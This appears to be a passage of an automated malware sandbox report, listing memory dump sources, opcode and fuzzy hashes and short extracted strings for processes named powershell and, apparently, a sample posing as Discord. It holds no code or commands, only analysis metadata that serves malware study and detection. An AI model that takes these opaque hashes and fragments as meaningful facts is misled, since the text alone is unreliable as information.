                                      • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                      • Instruction ID: 7d18de3127f3f1dd01fd625624dbb9d3bcbd9e505403495affb5961ee0d50b6a
                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                      • Instruction Fuzzy Hash: 4D01A73020CB0C4FD748EF0CE051AA5B3E0FB85360F10066DE58AC36A1DA32E882CB41
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2028433022.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: N_^$N_^$N_^$N_^
                                      • API String ID: 0-3900292545
                                      • Opcode ID: 842d009519e7c2484edc80ccc036ace5dfd69bd6248b23b1356a32c66baa1691
                                      • Instruction ID: 1259941069512258f8cec5da74ba931970a60bf0b13a41eabb5bb331ab8ceaec
                                      • Opcode Fuzzy Hash: 842d009519e7c2484edc80ccc036ace5dfd69bd6248b23b1356a32c66baa1691
                                      • Instruction Fuzzy Hash: 034163A2A0F7D64FE3164BA95C791957FA0EF9226470A43F7C1D8CB0B3ED18150B8356
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2028433022.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: N_^4$N_^7$N_^F$N_^J
                                      • API String ID: 0-3508309026
                                      • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                      • Instruction ID: 33318d810732aedc5b8d73b2cd603b97cdeee6fc6f3f35bf73613f10f45d9dd5
                                      • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                      • Instruction Fuzzy Hash: 3821497BB080654ED305BBBCBC289DD3750DFD423935642F2D2A9CB183EC14708A86C1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2222497725.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd9b8b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7f
                                      • API String ID: 0-4156207988
                                      • Opcode ID: dbf7ea9768f72be3f23def5b5878d115ee95cd69ba57a494644d0eef3e2d41af
                                      • Instruction ID: c462eabe737849c16c34a8d4573fa0b1cd6444d0f2fc7bb4709a520b1e9c4ab5
                                      • Opcode Fuzzy Hash: dbf7ea9768f72be3f23def5b5878d115ee95cd69ba57a494644d0eef3e2d41af
                                      • Instruction Fuzzy Hash: 45D13572A0FA9E4FEB659B7888645B5BBE0EF0A314B0901FED45CC70E3D918E905C781
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2221005169.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd9b7e0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3487309ab8b26002c9f388b36d96d6b8431b393b61375714c39138032a7c8381
                                      • Instruction ID: f90c03aeb680d48c930c6ec07fd866c3558b75cd0e17f14208e99b80cd25cfa1
                                      • Opcode Fuzzy Hash: 3487309ab8b26002c9f388b36d96d6b8431b393b61375714c39138032a7c8381
                                      • Instruction Fuzzy Hash: CCD16031A18A4D8FDF98DF58C465AAD7BE1FF68300F1542AAD449D72B6CB34E841CB81
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2222497725.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd9b8b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: da472695ac8e126ab8aec1e7942b5e85b5b3bd1d3eeec8ee0f6bf409943039cd
                                      • Instruction ID: f43e85095f42df5cd5f44a7b6b6d8c7edc78867ed76815278955e3223d9bc103
                                      • Opcode Fuzzy Hash: da472695ac8e126ab8aec1e7942b5e85b5b3bd1d3eeec8ee0f6bf409943039cd
                                      • Instruction Fuzzy Hash: EC511822F0EA5A0FEBA99B6C542367477D1EF98310B1E00BEC15DC71A3DD15EC068781
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2222497725.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd9b8b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f4ed8bbede882341eb8f161312f4d7b5709d6aaee155d2e15337b5f7496e54c1
                                      • Instruction ID: 0bd5dcccc7f2a38e04cc6b03be813f11c11ed0ff97cb6e9bbf392bac41e8f130
                                      • Opcode Fuzzy Hash: f4ed8bbede882341eb8f161312f4d7b5709d6aaee155d2e15337b5f7496e54c1
                                      • Instruction Fuzzy Hash: 65410633B0EA694FEBB9D7785422AB477D1EF88320B0E00BED059C71A7E915AD1187C1
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2221005169.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd9b7e0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 449476ddde25d73c4d4e931033806e36a390d8d24c8cec0fc571a7373ac85179
                                      • Instruction ID: fb8fb1c95825fd66476b44514d55ae07e7a95f5a2e60bda4a8687d2ba346a529
                                      • Opcode Fuzzy Hash: 449476ddde25d73c4d4e931033806e36a390d8d24c8cec0fc571a7373ac85179
                                      • Instruction Fuzzy Hash: 0941183190DB884FDB189B5C9C0A6B9BFE0EF95310F04426FE059932A2CA74AD15CBC6
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2219632482.00007FFD9B6CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd9b6cd000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fbb765b0eb57dbf4308c443cdbfec82abc470806cc15f3d6d4a58a905086a54a
                                      • Instruction ID: 1bfa19bbe1f0ac6666433526d251c827e69673d674de8975572875d28681116d
                                      • Opcode Fuzzy Hash: fbb765b0eb57dbf4308c443cdbfec82abc470806cc15f3d6d4a58a905086a54a
                                      • Instruction Fuzzy Hash: 0A41277150EBC84FE766AB2898559723FF0EF52220B1605DFD0C9CB1A3D629B846C792
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2222497725.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd9b8b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 54c25938abdfaf763182f8b0a6558f96501cfc710a24436478b90ce69b500367
                                      • Instruction ID: f5ed2cc5c9d241162acec3801142508062efd2ba1b7c32366983ed73fba6ba3d
                                      • Opcode Fuzzy Hash: 54c25938abdfaf763182f8b0a6558f96501cfc710a24436478b90ce69b500367
                                      • Instruction Fuzzy Hash: 3D21B122F0F9AB4FEBB59B68446357466D1EF68310B5E00BED05DC71B2DE18ED058B81
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2221005169.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd9b7e0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9e8ed430849548e6b02d7a2647ba548c2c5e57a580bf1efe836198531b1d60d9
                                      • Instruction ID: 2c024156510b3bae5b0da70aa95956434f0062f64a5b0fb3814b6bf7b3cd7af4
                                      • Opcode Fuzzy Hash: 9e8ed430849548e6b02d7a2647ba548c2c5e57a580bf1efe836198531b1d60d9
                                      • Instruction Fuzzy Hash: 0E21E93190C74C4FDB59DBAC984A7E97BE0EB96321F04426FD049C3162DA74A416CB92
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2222497725.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd9b8b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: db2ca2784a88b3e53e3fb4a231bf7f9817bec7d2c87ba27407ba21273a3c9b58
                                      • Instruction ID: ed6e97828cd6f68a7aed8767568a8082c97a593c6e71ceecdec733d48e092bcc
                                      • Opcode Fuzzy Hash: db2ca2784a88b3e53e3fb4a231bf7f9817bec7d2c87ba27407ba21273a3c9b58
                                      • Instruction Fuzzy Hash: 4211E333B4F5594FEBB8D76890719B476D1EF4832074E00BAE02DC75A2D919AD108780
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2221005169.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd9b7e0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                      • Instruction ID: 347eb46863d0610c54c5e9c05e70889870b2352b4ba84a369cc0dc72dc0b729b
                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                      • Instruction Fuzzy Hash: 6D01A73020CB0C4FD748EF0CE051AA5B3E0FF85320F10056DE58AC36A1DA32E882CB41
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2221005169.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd9b7e0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                      • API String ID: 0-962139525
                                      • Opcode ID: 7e7a3d8de407db449c69fa8481542aeb6a851cff63d93905096c5d76b6b201bf
                                      • Instruction ID: b114a5ea51b1871e90ed1c4dc2c7250fd3b437a7b478e6d328b580f01d32eadd
                                      • Opcode Fuzzy Hash: 7e7a3d8de407db449c69fa8481542aeb6a851cff63d93905096c5d76b6b201bf
                                      • Instruction Fuzzy Hash: BC210477B045658AC30676ACB8559DC7790DF9437A39643F3E029CF193ED18A48B8A80
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2295920777.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e429a3bf5f63afa3ed01209983f7ada0e12f7f95265fb80ac5ef7f2c37fe5e73
                                      • Instruction ID: 5873f4713be78d12f002be0bddb59d7c76976764d7edfe347b56f5138b86f37c
                                      • Opcode Fuzzy Hash: e429a3bf5f63afa3ed01209983f7ada0e12f7f95265fb80ac5ef7f2c37fe5e73
                                      • Instruction Fuzzy Hash: D822A760B19A494FE798EB7884B9BBD77D1FFD8344F450679E00EC32E6DE28A9018741
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2295920777.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7aff944eb0ef42b6df6bdb8515ef23c0f642c7ceb352072d80a5c6a40651aa75
                                      • Instruction ID: 5d40d7acdab681f90321f50c0734953b4faa1d41c097a47fac1582ac5b41d10b
                                      • Opcode Fuzzy Hash: 7aff944eb0ef42b6df6bdb8515ef23c0f642c7ceb352072d80a5c6a40651aa75
                                      • Instruction Fuzzy Hash: 37712816F0D6DA0EE356B67C64695F92BA1DFC623970981FBE0CDCA0E7DC0828478352
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2295920777.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 423c8cb82b6ae2bec3be225920dad8fb2ac70ce2e947fbb9b1b61fe942d2f605
                                      • Instruction ID: da76a0059c8c8369c333fc7e7eae16a464c09d8827496fe6bcab64f789b3f3ec
                                      • Opcode Fuzzy Hash: 423c8cb82b6ae2bec3be225920dad8fb2ac70ce2e947fbb9b1b61fe942d2f605
                                      • Instruction Fuzzy Hash: 8151FE10B1E6C94FD796ABB888746A57FE5DF87219B0806FBE09DC61E7DD18180AC342
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2295920777.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ;O_$<O_^
                                      • API String ID: 0-3431308889
                                      • Opcode ID: 357034b920004b4c8101a95bfa011ac73b7f9bba9c368e404dc195da4e12ad36
                                      • Instruction ID: c01658152b9928ca54320e83e96a800dcf1b2c9ffdabab7fcc97fbf7aee20942
                                      • Opcode Fuzzy Hash: 357034b920004b4c8101a95bfa011ac73b7f9bba9c368e404dc195da4e12ad36
                                      • Instruction Fuzzy Hash: EA513636B096894FE344EB6CA0F58E87BA0EFC4319B5145FAD059CB3DBDD286846CB40
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2295920777.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2O_^
                                      • API String ID: 0-2974816419
                                      • Opcode ID: 2614e019dc0551413e1eed5533bc2cdb08dd980c43f033b6c7d609f5afb74794
                                      • Instruction ID: 4a68c39b68360f4ab21b260e31343f9944dcb9c0714d143db9b1e919f7cb6be7
                                      • Opcode Fuzzy Hash: 2614e019dc0551413e1eed5533bc2cdb08dd980c43f033b6c7d609f5afb74794
                                      • Instruction Fuzzy Hash: 70510827F0969A4FD711E76CA4755ED7BB0EFC1225B0A42F6C09DDA1E3DD14284A8390
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2295920777.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2O_^
                                      • API String ID: 0-2974816419
                                      • Opcode ID: d654db4bfd9c6cd7d4085b95c2e69033f97794dfaab368e3dd0f984dbe91eb07
                                      • Instruction ID: 59f2a769a37c4db7ec2aa37e46e0872115bf7bf4429f042e485088314c2b0cee
                                      • Opcode Fuzzy Hash: d654db4bfd9c6cd7d4085b95c2e69033f97794dfaab368e3dd0f984dbe91eb07
                                      • Instruction Fuzzy Hash: 15512627F0969A0ED711F76CA4755ED7BB0EFC1225B0A42F7C09DDA1E3DC18284A8390
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2295920777.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7e3c2bfb3492a95d2fc633c98424b74a4c5e456f37123d9836262ea891a11834
                                      • Instruction ID: e4055c8bc573909d3fb79d54d9abf3860c0ec48fbe2431dafda36764ab7760f4
                                      • Opcode Fuzzy Hash: 7e3c2bfb3492a95d2fc633c98424b74a4c5e456f37123d9836262ea891a11834
                                      • Instruction Fuzzy Hash: 0031D072B09A8E4FD7509B68D8755EDBBB1FFC5240F4602B6D049E72F6CD242909C350
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2295920777.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2f61799ed224cec27c2133a62545a65831203e1fc9031aa76684f9848edbe290
                                      • Instruction ID: 1823f9ed0f07d6e53187ac8c53c971fab202e524f49a85d014e790096bf4379d
                                      • Opcode Fuzzy Hash: 2f61799ed224cec27c2133a62545a65831203e1fc9031aa76684f9848edbe290
                                      • Instruction Fuzzy Hash: 3551F436F0865A8BDB44FBACA475AEC73B1EFC432AB11467AD109C72D6CE246845C790
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2295920777.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_7ffd9b7d0000_Discord.jbxd
                                      • Instruction Fuzzy Hash: 68712916F0D6960EE356B67C64695F92BA1DFC623971981FBD0CDCA0E7DC0828478352
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 46793fe03cabaa1c2c1986507bd7e6aeca0dfcf0e968b74c199df410962363fa
                                      • Instruction ID: 07f8a700dbaf5897f8e6f63e24c2d1777ae0c244fcc59a645a27c71c4cf47c1d
                                      • Opcode Fuzzy Hash: 46793fe03cabaa1c2c1986507bd7e6aeca0dfcf0e968b74c199df410962363fa
                                      • Instruction Fuzzy Hash: 21510E10B1E6C94FD796ABB888746A57FE5DF87219B0806FBE09DC61E7DD18180AC342
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ;O_$<O_^
                                      • API String ID: 0-3431308889
                                      • Opcode ID: db8aab6df4bee7ce86a4826e94776b3b93e873064b9526f555bec7976701c058
                                      • Instruction ID: 952871612c1aa6977bebe9e66b133afc5a26ba5d1fef1b16ee489dca40642fc5
                                      • Opcode Fuzzy Hash: db8aab6df4bee7ce86a4826e94776b3b93e873064b9526f555bec7976701c058
                                      • Instruction Fuzzy Hash: F3512436F096894FD704EB68A0B58EC7BA0EFC4314B5545FAD4588B3DBDD3868468740
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2O_^
                                      • API String ID: 0-2974816419
                                      • Opcode ID: 6fb334a299daaab9adfef1ddddc2e0fdee2d2725c4cdc59b268792b0e196fba7
                                      • Instruction ID: fb9eaf09c307ad43c2ff639d4c677ea53a26d57b174ae24bbd8a91006bcf1c64
                                      • Opcode Fuzzy Hash: 6fb334a299daaab9adfef1ddddc2e0fdee2d2725c4cdc59b268792b0e196fba7
                                      • Instruction Fuzzy Hash: FF511527F0969A4ED711FBACA4755ED7B70EFC2225B0A42F7C09DDA1E3DD14284A8390
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2O_^
                                      • API String ID: 0-2974816419
                                      • Opcode ID: 3965e3dfdf327c9fd4b5b89d797357cd45928c6953c7876b73a4058aa573f782
                                      • Instruction ID: 8eec0dbe39411eee1810335f8f363add8e12051500edca192dfd0abc1ab0306c
                                      • Opcode Fuzzy Hash: 3965e3dfdf327c9fd4b5b89d797357cd45928c6953c7876b73a4058aa573f782
                                      • Instruction Fuzzy Hash: 5E512627F0969A0ED711FB6CA4755ED7B70EFC2225B0A42F7C09DDA1E3DC18284A8390
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1013cc69962d5f74f5d2bb0a6ac542f574156768de42b95a8fea35527e0777d0
                                      • Instruction ID: 9d3b2f0b45c72c8df0585cda4a9c8b822c7415c3066a1e79c251152f9de1fa01
                                      • Opcode Fuzzy Hash: 1013cc69962d5f74f5d2bb0a6ac542f574156768de42b95a8fea35527e0777d0
                                      • Instruction Fuzzy Hash: AC31D072B09A8E4FD7519B68D8755EDBBB1FFC6240F4602B6C049E72F6CD242909C350
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c842a1b083fabc3d4c90686654b715f4b8a47be311d9dfc9448123029612c012
                                      • Instruction ID: ad8340e86d0bf9cc95f34abd2a458bbea50411ac28884872daa71ad0bbe5df6c
                                      • Opcode Fuzzy Hash: c842a1b083fabc3d4c90686654b715f4b8a47be311d9dfc9448123029612c012
                                      • Instruction Fuzzy Hash: EA51F536F0961A8BDB04FBACA475AEC73B1FFC4326B55467AD009C72D6CE246885C790
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4fa6bbdd029069e4a89b0b1287c79149947f5c91d44810dbe619fbc50b45ccfc
                                      • Instruction ID: 19c679ff69dea44b054a5638b363401f0f2d909a89bb97d57073d1ff8afa9a1d
                                      • Opcode Fuzzy Hash: 4fa6bbdd029069e4a89b0b1287c79149947f5c91d44810dbe619fbc50b45ccfc
                                      • Instruction Fuzzy Hash: 1841D136B18A1E8FDB44FB68D865AED73A1FFC4311B54467AD009C72D6CE34A886C790
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1dcdd16438b6ddfee13cb1ece418e3f5c24f80c37f5ed2b1c373393c4eedd1fe
                                      • Instruction ID: cedacedf4fa756bd3a5a42e67a0cded8554f6996dfb2e2bd4f988094587d91fc
                                      • Opcode Fuzzy Hash: 1dcdd16438b6ddfee13cb1ece418e3f5c24f80c37f5ed2b1c373393c4eedd1fe
                                      • Instruction Fuzzy Hash: EB31D121B1C9490FE798EF6C9469679B2C2EFD8355F0546BEA05EC32E7DD24AC428341
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 25e7aa873ef6c579796df89d9b1a151490d9dcc7044717d658527890250281db
                                      • Instruction ID: 418a9ea806e1ccd207bb67409d9f687dd55e107c71b91ac69553623695c52f89
                                      • Opcode Fuzzy Hash: 25e7aa873ef6c579796df89d9b1a151490d9dcc7044717d658527890250281db
                                      • Instruction Fuzzy Hash: 87218415F1490A4BFB84BBBC546E7BC72D2EFD8715F504276E41DC32DADD28A8418392
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b1111266d1ee9574721b2d5fcf7ccb0531c108c3d25dccea98c2acd927cab506
                                      • Instruction ID: 551f81e130e01991e9cdb8f63af317adb5428c9c3348c89779b54f7e7e3498a2
                                      • Opcode Fuzzy Hash: b1111266d1ee9574721b2d5fcf7ccb0531c108c3d25dccea98c2acd927cab506
                                      • Instruction Fuzzy Hash: 97219F34B589494FD784EF68A0B19EDBF71AFC8300BA549E8E818C33CADD3869418B40
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 692284bf8073947c883380ce18c47777108c66124642f4e396995d1665d6e89f
                                      • Instruction ID: da6a6b01d45c4ea0a23b4244caa60b75067531b4dc4cf25f6adeca31b11993ec
                                      • Opcode Fuzzy Hash: 692284bf8073947c883380ce18c47777108c66124642f4e396995d1665d6e89f
                                      • Instruction Fuzzy Hash: 3E014754A0EB890FE7A1A6785C754757FE0CFD1391B0A07BBE888C60F7D8086B498392
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2966372490.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd9b7e0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d509e817fbbcec0c7515a2f80cc72f49c447a613064a246cd2704e255d0993fa
                                      • Instruction ID: 1a6754faa3fbd7bdab8ad5c25a466576fdb257282f99d7e7dcf3f3f47853deb3
                                      • Opcode Fuzzy Hash: d509e817fbbcec0c7515a2f80cc72f49c447a613064a246cd2704e255d0993fa
                                      • Instruction Fuzzy Hash: 2822A360B19A4D4FE798FB6C846ABB976D6FF98304F410579E00EC32E6DE28A8418745
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2966372490.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd9b7e0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
